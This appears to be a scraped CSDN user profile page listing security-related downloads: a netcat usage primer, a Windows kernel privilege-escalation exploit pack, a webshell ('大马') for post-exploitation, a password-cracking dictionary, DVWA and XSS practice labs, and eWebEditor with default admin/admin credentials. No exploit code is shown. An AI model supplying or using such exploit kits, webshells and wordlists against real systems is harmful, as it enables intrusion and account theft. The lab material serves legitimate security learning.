什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速                                                                                                                                                                                                                         nc的控制参数不少,常用的几个参数如下所列: 1) -l 用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。 2) -p <port> 暂未用到(老版本的nc可能需要在端口号前加-p参数,下面测试环境是centos6.6,nc版本是nc-1.84,未用到-p参数) 3) -s  指定发送数据的源IP地址,适用于多网卡机  4) -u  指定nc使用UDP协议,默认为TCP 5) -v 输出交互或出错信息,新手调试时尤为有用 6)-w 超时秒数,后面跟数字  7)-z 表示zero,表示扫描时不发送任何数据       前期准备 准备两台机器,用于测试nc命令的用法 主机A:ip地址 10.0.1.161 主机B:ip地址 10.0.1.162   两台机器先安装nc和nmap的包 yum install nc -y yum install nmap -y 如果提示如下-bash: nc: command not found 表示没安装nc的包 ———————————————— 版权声明:本文为CSDN博主「小毛毛2013」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/u012486730/article/details/82019996

2020-03-11

漏洞利用EXP windows-kernel-exploits-master.zip

本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。

2020-03-10

后渗透专用的提权大马

木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是控制端,另一个是被控制端。木马这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的特洛伊木马本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机。木马病毒的产生严重危害着现代网络的安全运行。   小马体积小,容易隐藏,隐蔽性强。大马体积比较大,功能多,危害大。

2020-03-10

passwod_17000.txt

密码字典,是配合密码破译软件所使用的。密码字典里包括许多人们习惯性设置的密码,这样可以提高密码破译软件的密码破译成功率和命中率,缩短密码破译的时间。 如果一个人密码设置没有规律或很复杂,未包含在密码字典里,这个字典就没有用了,甚至会延长密码破译所需要的时间。

2020-03-03

typecho.tar.gz

关于 名称的来历 Typecho 是由 type 和 echo 两个词合成的,来自于开发团队的头脑风暴。 Type,有打字的意思,博客这个东西,正是一个让我们通过打字,在网络上表达自己的平台。Echo,意思是回声、反馈、共鸣,也是PHP里最常见、最重要的函数,相信大部分PHP爱好者都是从 echo 'Hello,world!'; 开始自己的PHP编程之路的。 名称就表明 Typecho 是一款博客程序,它在 GPL version 2 许可证下发行,基于 PHP (需要 PHP5 以上版本)构建,可以运行在各种平台上,支持多种数据库(Mysql, PostgreSQL, SQLite)。 为什么开发 Typecho 源自开发团队在精神层面上的洁癖和狂热。在使用博客程序的大部分时间里,我们只是发几段文字,贴几张图片,不需要高级复杂的系统,需要的是一个简单快速的博客平台。在流行的开源程序中,满足我们要求的很少,于是我们决定自己动手,开发一款有性格的博客程序,并用开源协议发行。 开发团队中的几个人都是 IT 从业者,在成长的过程中从开源世界里获益匪浅,这个项目也是我们对开源的一个回报。 如何参与开发 Typecho Typecho 目前使用 Git 来控制程序版本,如果你想为 Typecho 贡献源代码,最好先弄明白 Git 的使用方法。我们目前把项目托管在 GitHub 上,任何 GitHub 用户都可以向我们贡献代码。 参与的方式很简单,【Fork】一份 Typecho 的代码到你的仓库中,修改后提交,并向我们发起【Pull Request】申请,我们会及你的申请并及时对代码进行审查。审查通过后,你的代码将被【Merge】进我们的仓库中,这样你就会自动出现在贡献者名单里了,非常方便。

2020-03-03

xss闯关小游戏.zip

这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载

2020-02-25

DVWA-安全测试靶场.zip

Web应用程序(DVWA)是一个PHP / MySQL的Web应用程序,它是该死的脆弱。 它的主要目标是成为一名安全专家援助法律环境中测试他们的技能和工具,帮助web开发人员更好地理解的过程确保web应用程序和帮助学生和老师了解web应用程序安全性控制教室环境。 DVWA的目的是 实践中一些最常见的web漏洞 , 不同程度的困难 ,用一个简单直观的界面。 一般的用法说明 它取决于用户如何DVWA方法。 要么通过每个模块工作在一个固定的水平,或选择任何模块和工作达到最高水平之前他们可以移动到下一个。 没有一个固定的对象完成一个模块; 但是用户觉得他们应该成功地利用了系统尽他们可能会利用这个漏洞。 请注意,有 记录和无证的弱点 用这个软件。 这是故意的。 你被鼓励尝试和发现尽可能多的问题。 DVWA还包括一个Web应用程序防火墙(WAF) PHPIDS,可以使在任何阶段进一步增加了困难。 这将演示如何添加另一层的安全可能会阻止某些恶意行为。 注意,还有各种各样的公共方法绕过这些保护(这可以被看作是一个扩展为更高级的用户)! 有一个帮助按钮在每个页面的底部,它允许您查看提示和技巧的脆弱性。 还有额外的链接进一步背景阅读,这涉及到安全问题。

2020-02-19

ewebeditor编辑器.rar

ACCESS数据库的后台管理编辑器 ======================================================================================================== eWebEditor ASP版,使用ACCESS配置数据库,带后台管理。为保证安全,强烈建议用户开始使用就修改后台管理用户及密码。 结构说明 ============================= admin : 后台管理相关图片 buttonimage : 按钮图片 css : 样式文件 db : 数据库文件 dialog : 对话框相关文件 example : 例子 include : 公用包含文件 sysimage : 系统图片 uploadfile : 默认的上传文件 安装=============================1、解开压缩包,直接拷贝到站点或建虚拟;2、访问例子文件,看是否运行正常: 1) eWebEditor 标准调用和弹窗调用示例: http://127.0.0.1/ewebeditor/example/test1.asp 2) eWebEditor 远程文件上传示例: http://127.0.0.1/ewebeditor/_example/test2.asp3、如果显示正常信息,即表示安装已完成! 使用=============================1、后台管理 地址:http://127.0.0.1/ewebeditor/admin_default.asp 默认登录用户:admin 默认登录密码:admin ======================================================================================================== ╭═══════════════╮ ║ ║ ╭══════┤ ├══════╮ ║ ║ 单机游戏网 ║ ║ ║ ║ ║ ║ ║ ╰═══════════════╯ ║ ║ ║ ║声明: ║ ║ 1) 本站不保证所提供软件或程序的完整性和安全性。 ║ ║ 2) 请在使用前查毒。 ║ ║ 4) 转载本站提供的资源请勿删除本说明文件。 ║ ║ 5) 本站提供的程序均为网上搜集,如果该程序涉及或侵害到您║ ║ 的版权请立即写信通知我们。 ║ ║ 6) 本站提供软件只可供研究使用,请在下载24小时内删除, ║ ║ 切勿用于商业用途,由此引起一切后果与本站无关。 ║ ║ ║ ║ 1. 推荐使用:WinRAR V3.2以上版本解压本站软件 ║ ║ ║ ║ ║ ║ ║ ║ ╭───────────────────────╮ ║ ╰══┤ ├══╯ ╰───────────────────────╯

2020-02-17

C32Asm_setup.zip

C32ASM静态反汇编工具功能概述 C32Asm现具有如下功能: 快速静态反汇编PE格式文件(Exe、Dll等) 提供Hex文件编辑功能,功能强大 提供内存Dump、内存编辑、PE文件Dump、PE内存ImageSize修正等多种实用功能 提供内存反汇编功能,提供汇编语句直接修改功能,免去OPCode的直接操作的繁琐 提供反汇编语句彩色语法功能,方便阅读分析,能方便自定义语法色彩 提供输入表、输出表、参考字符、跳转、调用、PE文件分析结果等显示 提供方便的跳转、调用目标地址的代码显示 提供汇编语句逐字节分析功能,有助于分析花指令等干扰代码 提供对ord调用和非ord调用的import自定义解析功能 提供PE文件格式的分析显示功能 提供文件拖放功能,直接可以进行文件反汇编或编辑 提供主文件命令行模式,方便加入右键菜单进行快速的文件操作 提供快速书签定位,多行代码复制,代码注释功能

2020-02-15

BurpSuite.zip

Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

2020-02-13

社会工程学_百度百科.pdf

这是对社会工程学的详细解答,它主要讲解了社会工程学的起源、主要内容、社工手段、防御手段四个方面并配有详细的解答

2020-02-06

谁能教我iapp怎么用

发表于 2020-03-30 最后回复 2020-03-30

优秀小版主是什么?我想要一个,帮帮我

发表于 2020-02-26 最后回复 2020-02-26

热门文章数据更新不及时

发表于 2020-02-06 最后回复 2020-02-06

中国大陆人口已突破14亿——你是比以前更渺小了,还是被更多人所敬仰了?

发表于 2020-01-17 最后回复 2020-01-19

一个高中学历,初学网安的退伍军人入行有多难

发表于 2020-01-04 最后回复 2020-01-05

手机安装linux

发表于 2020-01-03 最后回复 2020-01-03

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除